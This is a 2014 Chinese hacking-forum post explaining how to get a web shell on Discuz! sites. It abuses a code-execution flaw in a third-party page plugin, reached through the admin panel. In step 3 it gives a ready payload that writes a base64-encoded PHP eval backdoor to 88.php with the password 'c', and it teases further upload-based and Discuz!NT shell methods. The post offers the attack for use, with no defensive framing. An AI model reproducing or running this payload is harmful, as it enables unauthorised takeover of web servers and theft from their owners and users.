Discuz!多个版本后台拿shell，需有安装APP权限

dly · 发表于 2014-3-7 13:45:50

dz的新版安装插件需要安全码，恐怕这个比较难获取

具体哪些版本存在漏洞，自己测试，只要能安装这个插件的，就能拿到shell，这个已经在手里很久了，但是使用其拿shell,也没几次，没事写出来，大家乐乐，别忘记感谢。

这个方法，就是需要 zend 支持【插件zend加密】，当然我还有一个不需要ZEND支持的，都是 app第三方的插件问题。

下面我来说说过程吧！

1.安装 zend 权限检查插件，因为后面利用到的插件是zend加密的，只要装了这个插件，后面的插件才能正常安装！

http://addon.discuz.com/?@study_zendcheck.pack

2.安装雨哲关于我们单页插件。【ps：雨哲的好几个插件都有这个代码执行漏洞，自己发掘～！】

3.页面管理，随便编辑一个页面，注意到了吧，没错，任意代码执行，下面我们就让生成一个小马

我插入：

fputs(fopen('88.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));
然后我提交！

4.保存好后，我们点预览刚才编辑的页面，如图：

5.来看看我们的成果，会在根目录下面生成：88.php 密码为：c

无图无真相，翠花上图：

还有一个不需要 zend权限的插件，能直接上传任何后缀名的文件，看感谢情况而定，是否发出。

还有 Discuz!NT 高版本 rss.aspx 不能编辑的情况下，进入后台后拿shell 的办法。这次就不说了

Discuz!多个版本后台拿shell，需有安装APP权限

相关帖子